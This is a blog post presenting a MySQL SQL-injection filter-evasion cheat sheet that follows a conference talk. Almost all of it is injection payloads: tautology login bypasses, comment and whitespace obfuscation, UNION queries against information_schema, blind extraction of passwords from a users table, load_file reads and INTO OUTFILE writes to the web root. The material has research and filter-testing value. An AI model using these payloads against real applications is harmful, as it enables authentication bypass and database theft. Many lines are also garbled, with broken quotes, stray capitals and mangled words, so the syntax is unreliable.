SQLi Filter Evasion cheat sheet (MySQL)

This week I presented my experiences in SQLi filter evasion techniques that I had gained during 3 years of Phpids filter Evasion at the CONFidence 2.0 conference. You can find the slides here. For a quicker reference your can use the following cheatsheet. More detailed explaination can is found in the slides or in the talk (video should come online in a few weeks).

Basic Filter

Comments
' Or 1=1#
' Or 1=1–-
' Or 1=1/* (MySQL < 5.1)
' Or 1=1;%0 0
' or 1=1 union select as '
' Or#newline
1= ' 1
' Or–-newline
1= ' 1
'/*!50000or*/1= ' 1
'/*!or*/1= ' 1

Prefixes
+–~!
' Or–+2=--!!! ' 2

Operators
^, =,! =,%,/, *, &, &&, |, | |,, >>, <=, <=,,, XOR, DIV, like, SOUNDS like, Rlike, REGEXP, LEAs T, Greatest, CAST, CONVERT, is, in, not, MATCH, and, OR, BINARY, between, ISNULL

Whitespaces
%20%09%0a%0b%0c%0d%a0/**/
' or+ (1) sounds/**/like "1" –%a0-
' Union (select (1), Tabe_name, (3) from ' information_schema '. ' Tables ') #

Strings with quotes
SELECT ' a '
Select "A"
SELECT N ' a '
SELECT B ' 1100001′
SELECT _binary ' 1100001′
SELECT x ' 61 '

Strings without quotes
' ABC ' = 0x616263

Aliases
Select Pass as alias from users
Select Pass Aliasalias from users
Select Pass ' Alias alias ' from users

Typecasting
' or True = ' 1 # or 1=1
' or Round (pi (), 1) +true+true = version () # or 3.1+1+1 = 5.1
' or ' 1 # or True

Compare operator typecasting
SELECT * from users where ' a ' = ' b ' = ' C '
SELECT * from Users where (' a ' = ' b ') = ' C '
SELECT * from users where (false) = ' C '
SELECT * from users where (0) = ' C '
SELECT * from users where (0) =0
SELECT * from users where true
SELECT * from Users

Authentication Bypass ' = '
SELECT * from users where name = "="
SELECT * from users where false = "
SELECT * from users where 0 = 0
SELECT * from users where true
SELECT * from Users

Authentication Bypass '-'
SELECT * from users WHERE name = "-"
SELECT * from users where name = 0-0
SELECT * from users where 0 = 0
SELECT * from users where true
SELECT * from Users

Function Filter

General function filtering
ASCII (97)
load_file/*foo*/(0x616263)

Strings with functions
' abc ' = Unhex (616263)
' abc ' = CHAR (97,98,99)
Hex (' a ') = 61
ASCII (' a ') = 97
Ord (' a ') = 97
' ABC ' = concat (CONV (10,10,36), conv (11,10,36), conv (12,10,36))

Strings extracted from gadgets
Collation (\ n)//binary
Collation (User ())//Utf8_general_ci
@ @time_format//%h:%i:%s
@ @binlog_format//MIXED
@ @version_comment//MySQL Community Server (GPL)
Dayname (From_days (401))//Monday
Dayname (From_days (403))//Wednesday
MonthName (From_days (690))//November
MonthName (From_unixtime (1))//January
Collation (Convert ((1) using/**/koi8r))//Koi8r_general_ci
(select (collation_name) from (information_schema.collations) where (ID) =2)//Latin2_czech_cs

Special characters extracted from gadgets
Aes_encrypt (1,12)//4çh±{? " ^cxhééea
Des_encrypt//' Gò/ïök
@ @ft_boolean_syntax//+->< () ~*: "" &|
@ @date_format//%y-%m-%d
@ @innodb_log_group_home_dir//. \

Integer Representations
false:0
True:1
True+true:2
Floor (PI ()): 3
Ceil (Pi ()): 4
Floor (Version ()): 5
Ceil (Version ()): 6
Ceil (Pi () +pi ()): 7
Floor (Version () +pi ()): 8
Floor (PI () *pi ()): 9
Ceil (Pi () *pi ()): 10
Concat (true,true): 11
Ceil (Pi () *pi ()) +true:11
Ceil (Pi () +pi () +version ()): 12
Floor (PI () *pi () +pi ()): 13
Ceil (Pi () *pi () +pi ()): 14
Ceil (Pi () *pi () +version ()): 15
Floor (PI () *version ()): 16
Ceil (Pi () *version ()): 17
Ceil (Pi () *version ()) +true:18
Floor ((Pi () +pi ()) *pi ()): 19
Ceil ((Pi () +pi ()) *pi ()): 20
Ceil (Ceil (Pi ()) *version ()): 21
Concat (true+true,true): 21
Ceil (Pi () *ceil (Pi () +pi ())): 22
Ceil (Pi () +ceil (PI)) *pi ()): 23
Ceil (Pi ()) *ceil (Version ()): 24
Floor (PI () * (Version () +pi ())): 25
Floor (Version () *version ()): 26
Ceil (Version () *version ()): 27
Ceil (Pi () *pi () *pi ()-pi ()): 28
Floor (PI () *pi () *floor (Pi ())): 29
Ceil (Pi () *pi () *floor (Pi ())): 30
Concat (Floor (PI ()), false): 30
Floor (PI () *pi () *pi ()): 31
Ceil (Pi () *pi () *pi ()): 32
Ceil (Pi () *pi () *pi ()) +true:33
Ceil (Pow (pi (), pi ())-pi ()): 34
Ceil (Pi () *pi () *pi () +pi ()): 35
Floor (Pow (pi (), Pi ())): 36

@ @new: 0
@ @log_bin: 1

!PI (): 0
!! Pi (): 1
True-~true:3
Log (-cos (PI)): 0
-cos (Pi ()): 1
Coercibility (User ()): 3
Coercibility (Now ()): 4

Minute (now ())
Hour (now ())
Day (now ())
Week (now ())
Month (now ())
Year (now ())
Quarter (now ())
Year (@ @timestamp)
CRC32 (True)

Extract substrings
SUBSTR (' abc ', +) = ' a '
SUBSTR (' abc ' from 1 for 1) = ' a '
SUBSTRING (' abc ', +) = ' a '
SUBSTRING (' abc ' from 1 for 1) = ' a '
Mid (' abc ', +) = ' a '
Mid (' abc ' from 1 for 1) = ' a '
Lpad (' abc ', 1,space (1)) = ' A '
Rpad (' abc ', 1,space (1)) = ' A '
Left (' abc ', 1) = ' a '
Reverse (Right (reverse (' abc '), 1)) = ' A '
Insert (' abc ', 1,0,space (0)), 2,222,space (0)) = ' A '
Space (0) = Trim (version () from (version ()))

Search substrings
Locate (' A ', ' abc ')
Position (' A ', ' abc ')
Position (' A ' in ' abc ')
InStr (' abc ', ' A ')
Substring_index (' ab ', ' B ', 1)

Cut substrings
Length (Trim (leading ' a ' from ' abc '))
Length (replace (' abc ', ' A ', "))

Compare strings
strcmp (' A ', ' a ')
MoD (' A ', ' a ')
Find_in_set (' A ', ' a ')
Field (' A ', ' a ')
Count (concat (' A ', ' a '))

String length
Length ()
Bit_length ()
Char_length ()
Octet_length ()
Bit_count ()

String case
UCase
LCase
Lower
Upper
Password (' a ')! = password (' a ')
Old_password (' a ')! = Old_password (' a ')
MD5 (' a ')! = MD5 (' a ')
Sha (' a ')! = Sha (' a ')
Aes_encrypt (' a ')! = Aes_encrypt (' a ')
Des_encrypt (' a ')! = Des_encrypt (' a ')

Keyword Filter

Connected keyword Filtering
(0) Union (SELECT (table_name), COLUMN_NAME,...
0/**/union/*!50000select*/table_name ' foo '/**/...
0%A0UNION%A0SELECT%09GROUP_CONCAT (table_name) ....
0 ' UNION ALL SELECT ' table_name ' foo from ' Information_schema '. ' Tables '

OR, and
' | | 1= ' 1
' &&1= ' 1
=
‘-‘

OR, and, UNION
' and (select pass from users limit 1) = ' secret

OR, and, UNION, LIMIT
' and (select pass from users where ID =1) = ' A

OR, and, UNION, LIMIT, WHERE
' and (select pass from the Users group by ID has id = 1) = ' A

OR, and, UNION, LIMIT, WHERE, GROUP
' and length (select pass from the users having substr (pass,1,1) = ' a '))

OR, and, UNION, LIMIT, WHERE, GROUP, having
' and (select substr (pass), Group_concat) from users) = ' A
' and substr ((select Max (pass) from users) = ' A
' and substr ((select max (replace, ' lastpw ', ') ' from Users), () = ' A

OR, and, UNION, LIMIT, WHERE, GROUP, having, SELECT
' and substr (load_file (' file '), locate (' DocumentRoot ', (load_file (' file '))) +length (' DocumentRoot '), [+] = ' A
' = ' into outfile '/var/www/dump.txt

OR, and, UNION, LIMIT, WHERE, GROUP, having, SELECT, FILE
' Procedure analyse () #
'-if (name= ' Admin ', 1,0) #
'-if (if (name= ' Admin ', 1,0), if (substr (pass,1,1) = ' A ', 1,0), 0) #

Control Flow
Case ' A ' is ' a ' then 1 [else 0] End
Case "a ' = ' a ' then 1 [else 0] End
if (' a ' = ' a ', 1,0)
Ifnull (Nullif (' A ', ' a '), 1)

If you had any other useful tricks I forgot to the list here, leave a comment.

SQLi Filter Evasion cheat sheet (MySQL)